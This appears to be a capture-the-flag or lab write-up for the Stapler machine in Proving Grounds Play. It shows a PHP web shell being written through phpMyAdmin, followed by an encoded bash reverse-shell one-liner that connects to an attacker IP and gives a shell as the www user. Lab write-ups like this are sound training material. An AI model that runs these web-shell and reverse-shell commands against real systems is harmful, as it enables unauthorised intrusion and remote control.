Webshell
/Play/Stapler/3-Exploitation/attachments/{BA0EBA65-4808-43EE-B84C-CC931802BAB5}.png)
Using the authenticated phpMyAdmin session, Writing a web shell to the /home/www/webshell.php
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ curl -s http://$IP/webshell.php?cmd=id
uid=1028(www) gid=1028(www) groups=1028(www)Code execution confirmed.
This is the web server on the target port 80 that uses PHP
It was Fuzzing that the web root directory was running off somebody’s home directory.
That somebody turned out to be the www user
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ cmd="$(echo 'bash -c "bash -i >& /dev/tcp/192.168.45.191/9998 0>&1"' | urlencode)" ; echo $cmd ; curl -s http://$IP/webshell.php?cmd=$cmd
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.191%2F9998%200%3E%261%22%0AInvoking a reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/stapler]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [192.168.45.191] from (UNKNOWN) [192.168.239.148] 38962
bash: cannot set terminal process group (1962): Inappropriate ioctl for device
bash: no job control in this shell
www@red:~$ whoami
whoami
www
www@red:~$ hostname
hostname
red.initech
www@red:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:7b:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.239.148/24 brd 192.168.239.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www user via PHP webshell upload through database